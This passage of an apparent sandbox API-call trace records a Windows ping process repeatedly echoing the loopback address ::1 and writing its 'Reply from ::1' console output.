lpBuffer=0x28f26c, nSize=0x0, Arguments=0x28f268 | out: lpBuffer="\xf0\x38\x4a") returned 0x19 [0118.643] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x4a38f0, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0118.643] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.644] _write (in: _FileHandle=1, _Buf=0x4a38f0*, _MaxCharCount=0x19 | out: _Buf=0x4a38f0*) returned 25 [0118.644] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.644] LocalFree (hMem=0x4a38f0) returned 0x0 [0118.644] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xf0\x38\x4a") returned 0x18 [0118.644] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x4a38f0, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0118.644] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.644] _write (in: _FileHandle=1, _Buf=0x4a38f0*, _MaxCharCount=0x18 | out: _Buf=0x4a38f0*) returned 24 [0118.644] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.644] LocalFree (hMem=0x4a38f0) returned 0x0 [0118.644] SetConsoleCtrlHandler (HandlerRoutine=0x2417ca, Add=1) returned 1 [0118.644] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0118.645] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0118.646] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0118.646] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0118.646] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.646] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0118.646] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.646] LocalFree (hMem=0x4a51b8) returned 0x0 [0118.646] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0118.646] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0118.646] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.646] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0118.646] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.646] LocalFree (hMem=0x4a29e8) returned 0x0 [0118.646] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0118.646] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0118.646] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.646] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0118.647] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.647] LocalFree (hMem=0x4a8f68) returned 0x0 [0118.647] Sleep (dwMilliseconds=0x3e8) [0119.848] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0119.932] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0119.932] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0119.932] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0119.932] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.932] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0119.932] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.932] LocalFree (hMem=0x4a51b8) returned 0x0 [0119.932] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0119.932] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0119.932] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.932] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0119.932] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.932] LocalFree (hMem=0x4a29e8) returned 0x0 [0119.932] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0119.932] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0119.932] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.932] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0119.933] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.933] LocalFree (hMem=0x4a8f68) returned 0x0 [0119.933] Sleep (dwMilliseconds=0x3e8) [0125.839] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0126.149] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0126.149] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0126.149] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0126.149] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0126.149] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0126.149] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0126.149] LocalFree (hMem=0x4a51b8) returned 0x0 [0126.149] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0126.149] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0126.149] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0126.149] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0126.149] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0126.149] LocalFree (hMem=0x4a29e8) returned 0x0 [0126.149] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0126.149] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0126.149] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0126.149] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0126.150] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0126.150] LocalFree (hMem=0x4a8f68) returned 0x0 [0126.150] Sleep (dwMilliseconds=0x3e8) [0127.499] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0127.576] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0127.577] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0127.577] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0127.577] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0127.577] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0127.577] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0127.577] LocalFree (hMem=0x4a51b8) returned 0x0 [0127.577] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0127.577] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0127.577] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0127.577] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0127.577] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0127.577] LocalFree (hMem=0x4a29e8) returned 0x0 [0127.577] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0127.577] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0127.577] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0127.577] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0127.577] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0127.577] LocalFree (hMem=0x4a8f68) returned 0x0 [0127.577] Sleep (dwMilliseconds=0x3e8) [0128.649] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0128.719] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0128.719] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0128.719] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0128.719] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0128.719] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0128.720] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0128.720] LocalFree (hMem=0x4a51b8) returned 0x0 [0128.720] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2726, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0128.720] CharToOemBuffA (in: lpszSrc="time=7ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time=7ms ") returned 1 [0128.720] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0128.720] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0128.720] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0128.720] LocalFree (hMem=0x4a29e8) returned 0x0 [0128.720] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0128.720] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0128.720] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0128.720] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0128.720] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0128.720] LocalFree (hMem=0x4a8f68) returned 0x0 [0128.720] Sleep (dwMilliseconds=0x3e1) [0129.787] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0129.892] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0129.892] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0129.892] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0129.892] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0129.892] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0129.892] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0129.892] LocalFree (hMem=0x4a51b8) returned 0x0 [0129.892] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0129.892] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0129.893] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0129.893] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0129.893] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0129.893] LocalFree (hMem=0x4a29e8) returned 0x0 [0129.893] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0129.893] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0129.893] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0129.893] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0129.893] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0129.893] LocalFree (hMem=0x4a8f68) returned 0x0 [0129.893] Sleep (dwMilliseconds=0x3e8) [0130.980] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0131.035] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0131.035] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0131.035] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0131.035] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0131.035] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0131.035] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0131.035] LocalFree (hMem=0x4a51b8) returned 0x0 [0131.035] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0131.035] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0131.036] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0131.036] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0131.036] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0131.036] LocalFree (hMem=0x4a29e8) returned 0x0 [0131.036] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0131.036] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0131.036] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0131.036] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0131.036] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0131.036] LocalFree (hMem=0x4a8f68) returned 0x0 [0131.036] Sleep (dwMilliseconds=0x3e8) [0132.173] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0132.344] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0132.345] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0132.345] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0132.345] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0132.345] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0132.345] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0132.345] LocalFree (hMem=0x4a51b8) returned 0x0 [0132.345] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0132.345] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0132.345] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0132.345] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0132.345] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0132.345] LocalFree (hMem=0x4a29e8) returned 0x0 [0132.345] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0132.345] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0132.345] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0132.345] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0132.345] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0132.345] LocalFree (hMem=0x4a8f68) returned 0x0 [0132.345] Sleep (dwMilliseconds=0x3e8) [0133.469] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0133.670] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0133.670] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0133.671] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0133.671] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0133.671] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0133.671] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0133.671] LocalFree (hMem=0x4a51b8) returned 0x0 [0133.671] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0133.672] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0133.672] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0133.672] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0133.672] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0133.672] LocalFree (hMem=0x4a29e8) returned 0x0 [0133.672] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0133.672] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0133.672] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0133.672] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0133.672] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0133.672] LocalFree (hMem=0x4a8f68) returned 0x0 [0133.672] Sleep (dwMilliseconds=0x3e8) [0134.731] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0134.804] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0134.804] FormatMessageA (in: 